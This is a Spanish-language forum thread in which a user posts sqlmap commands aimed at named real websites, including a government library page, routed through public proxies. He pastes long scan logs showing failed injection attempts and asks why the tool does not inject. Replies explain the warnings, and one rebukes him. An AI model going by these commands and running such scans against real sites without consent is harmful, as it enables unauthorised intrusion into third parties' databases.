Hola buenas soy nuevo en el foro ::) y no se si me podrían ayudar cuando quiero injectar con sqlmap en alguna pagina me sale este error ya los probé con varias paginas ,pero sale igual . OJO: no quiero hacer ningunas maldades XD solo estoy probando :rolleyes:
EN linux usando proxy y tambien lo eh probrado sin el , con vpn .Nota :los proxy y los vpn andan bn
cd /pentest/web/scanners/sqlmap
cd /pentest/database/sqlmap/
./sqlmap.py --proxy http://217.196.113.81:8080 -u http://www.bibliotecayacucho.gob.ve/fba/index.php?id=103 --dbs
y me sale este error:
------------------------------------------------------------------------
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
- starting at: 06:08:00
[06:08:01] [INFO] using '/pentest/database/sqlmap/output/www.bibliotecayacucho.gob.ve/session' as session file
[06:08:01] [INFO] testing connection to the target url
[06:08:25] [INFO] testing if the url is stable, wait a few seconds
[06:08:29] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[06:08:33] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:08:53] [INFO] url is stable
[06:08:53] [INFO] testing if GET parameter 'id' is dynamic
[06:08:57] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:09:02] [INFO] heuristics detected web page charset 'ascii'
[06:09:02] [INFO] confirming that GET parameter 'id' is dynamic
[06:09:03] [INFO] GET parameter 'id' is dynamic
[06:09:06] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[06:09:06] [INFO] testing sql injection on GET parameter 'id'
[06:09:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[06:09:16] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:09:32] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[06:09:33] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:09:39] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[06:09:47] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:09:56] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:10:02] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:10:06] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[06:10:20] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:10:22] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:10:28] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:10:31] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[06:10:36] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:10:38] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[06:10:49] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:10:50] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent
[06:10:54] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:10:56] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:10:58] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:11:08] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent
[06:11:08] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[06:11:17] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[06:11:24] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:11:28] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:11:29] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:11:31] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:11:34] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[06:11:45] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[06:11:56] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[06:11:56] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[06:11:56] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. if the problem persists please wait for few minutes and rerun without flag T in --technique option (e.g. --flush-session --technique=BEUS) or try to lower the --time-sec value (e.g. --time-sec=2)
[06:11:58] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:12:07] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[06:12:09] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[06:12:16] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:12:17] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:12:23] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[06:12:27] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:12:31] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:12:32] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:12:34] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[06:12:37] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[06:12:38] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:12:49] [INFO] testing 'Oracle AND time-based blind'
[06:12:50] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:12:55] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:12:56] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:13:05] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[06:13:14] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:13:18] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:13:23] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:13:35] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:13:42] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:13:46] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:14:10] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:14:19] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:14:33] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:14:56] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[06:14:57] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:15:01] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:15:02] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:15:06] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:15:18] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:15:45] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:16:18] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:16:43] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:17:56] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[06:18:03] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:18:17] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[06:18:17] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
[06:18:21] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:18:22] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:18:24] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:18:26] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent
[06:18:27] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:18:34] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:18:57] [INFO] target url appears to be UNION injectable with 2 columns
[06:19:07] [WARNING] please consider usage of --union-char option (e.g. --union-char=1) to make it work
[06:19:18] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:19:21] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[06:19:30] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:20:01] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:20:03] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:20:09] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:20:14] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:20:15] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[06:20:17] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent
[06:20:17] [INFO] target url appears to be UNION injectable with 10 columns
[06:20:17] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:20:25] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:20:31] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:20:35] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:20:44] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:20:55] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:21:09] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[06:21:15] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:21:20] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:21:22] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:21:23] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:21:36] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:21:37] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:21:42] [WARNING] please consider usage of --union-char option (e.g. --union-char=1) to make it work
[06:21:51] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:21:56] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[06:22:02] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:22:07] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent, sqlmap is going to retry the request
[06:22:10] [WARNING] GET parameter 'id' is not injectable
[06:22:10] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details
- shutting down at: 06:22:10
----------------------------------------------------------------------------
Lo probé con windows tambien y me sale el mismo error
AHora en windows sin proxy haber si sale tengo python 2.7 lo probe y igual el mismo error
C:\sqlmap>sqlmap.py -u http://www.fivemusic.net/evento.php?id=4 --dbs
y me sale esto
----------------------------------------------------------------------------
C:\sqlmap>sqlmap.py -u http://www.fivemusic.net/evento.php?id=4 --dbs
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
- starting at: 05:57:05
[05:57:05] [INFO] using 'C:\sqlmap\output\www.fivemusic.net\session' as session
file
[05:57:06] [INFO] testing connection to the target url
[05:57:07] [INFO] testing if the url is stable, wait a few seconds
[05:57:09] [INFO] url is stable
[05:57:09] [INFO] testing if GET parameter 'id' is dynamic
[05:57:10] [WARNING] GET parameter 'id' is not dynamic
[05:57:11] [WARNING] heuristic test shows that GET parameter 'id' might not be i
njectable
[05:57:11] [INFO] testing sql injection on GET parameter 'id'
[05:57:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[05:57:44] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[05:58:15] [CRITICAL] connection timed out to the target url or proxy, sqlmap is
going to retry the request
[05:59:18] [CRITICAL] connection timed out to the target url or proxy, sqlmap is
going to retry the request
[05:59:56] [CRITICAL] connection timed out to the target url or proxy, sqlmap is
going to retry the request
[05:59:58] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[06:00:57] [CRITICAL] connection timed out to the target url or proxy, sqlmap is
going to retry the request
[06:00:59] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[06:01:30] [CRITICAL] connection timed out to the target url or proxy, sqlmap is
going to retry the request
[06:02:02] [CRITICAL] connection timed out to the target url or proxy, sqlmap is
going to retry the request
[06:02:08] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[06:03:01] [CRITICAL] connection timed out to the target url or proxy, sqlmap is
going to retry the request
[06:03:32] [CRITICAL] connection timed out to the target url or proxy, sqlmap is
going to retry the request
[06:03:50] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[06:04:00] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[06:04:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[06:04:12] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[06:04:18] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[06:04:23] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[06:04:25] [INFO] testing 'Oracle AND time-based blind'
[06:04:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[06:05:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[06:05:23] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS
[06:06:13] [WARNING] GET parameter 'id' is not injectable
[06:06:13] [CRITICAL] all parameters are not injectable, try to increase --level
/--risk values to perform more tests. Rerun without providing the --technique sw
itch. Give it a go with the --text-only switch if the target page has a low perc
entage of textual content (~1.52% of page content is text)
- shutting down at: 06:06:13
C:\sqlmap>
----------------------------------------------------------------------
A que se debe es que tengo que configurar el sqlmap en sqlmap.conf o algo y como lo hago XD , no se xq me sale eso la vd
.Bueno espero que me ayuden y haber a quien le ha pasado y lo haya solucionado para que me eche una mano xq no encuentro nada en google o no sabre buscar bn XD .Espero que me ayuden .saludos
segui intentando en linux , pero sale esto
./sqlmap.py -u "http://www.bibliotecayacucho.gob.ve/fba/index.php?id=103" --dbs --proxy http://41.75.201.207:80
me sale esto :
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
- starting at: 07:54:40
[07:54:40] [INFO] using '/pentest/database/sqlmap/output/www.bibliotecayacucho.gob.ve/session' as session file
[07:54:40] [INFO] testing connection to the target url
[07:54:41] [INFO] testing if the url is stable, wait a few seconds
[07:54:43] [INFO] url is stable
[07:54:43] [INFO] testing if GET parameter 'id' is dynamic
[07:54:43] [INFO] heuristics detected web page charset 'ascii'
[07:54:43] [INFO] confirming that GET parameter 'id' is dynamic
[07:54:44] [INFO] GET parameter 'id' is dynamic
[07:54:45] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[07:54:45] [INFO] testing sql injection on GET parameter 'id'
[07:54:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[07:54:55] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[07:54:59] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[07:55:02] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[07:55:09] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[07:55:13] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[07:55:16] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[07:55:20] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[07:55:23] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[07:55:29] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[07:55:38] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[07:56:12] [INFO] GET parameter 'id' is 'Microsoft SQL Server/Sybase time-based blind' injectable
[07:56:12] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[07:56:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[07:57:02] [INFO] checking if the injection point on GET parameter 'id' is a false positive
[07:57:03] [WARNING] false positive injection point detected
[07:57:03] [WARNING] GET parameter 'id' is not injectable
[07:57:03] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details
- shutting down at: 07:57:03
Que quiere decir
[07:57:02] [INFO] checking if the injection point on GET parameter 'id' is a false positive
[07:57:03] [WARNING] false positive injection point detected
[07:57:03] [WARNING] GET parameter 'id' is not injectable
[07:57:03] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details
y porq no injecta el sqlmap ? :huh: alguien me podria ayudar :rolleyes:
Cita de: joseph Lovato en 24 Febrero 2012, 14:05 PM
Que quiere decir
[07:57:02] [INFO] checking if the injection point on GET parameter 'id' is a false positive
[07:57:03] [WARNING] false positive injection point detected
[07:57:03] [WARNING] GET parameter 'id' is not injectable
[07:57:03] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details
y porq no injecta el sqlmap ? :huh: alguien me podria ayudar :rolleyes:
Si no sabes inglés lo tienes complicado para usar cualquier cosa en linux :S
Fíjate en los warnings:
[07:57:03] [WARNING] false positive injection point detected = Pensó que era inyectable pero no.
[07:57:03] [WARNING] GET parameter 'id' is not injectable = Te dice que el campo id del GET no es inyectable.
1) Esto vá en Hacking Linux/Unix
2) publicaste los detalles del comando como el proxy que usás ... lo cual queda en logs, así como este post en google, y pueden enviar tranquilamente una orden a el-brujo pidiendo tu verdadera IP, y dudo que diga que no
3) Dudo que alguien te ayude a usar una tool que siquiera sabés usar para algo como esto...
Saludos.
lovato mira mis post
a ver si algo podemos solucionar
= estamos
att
teresa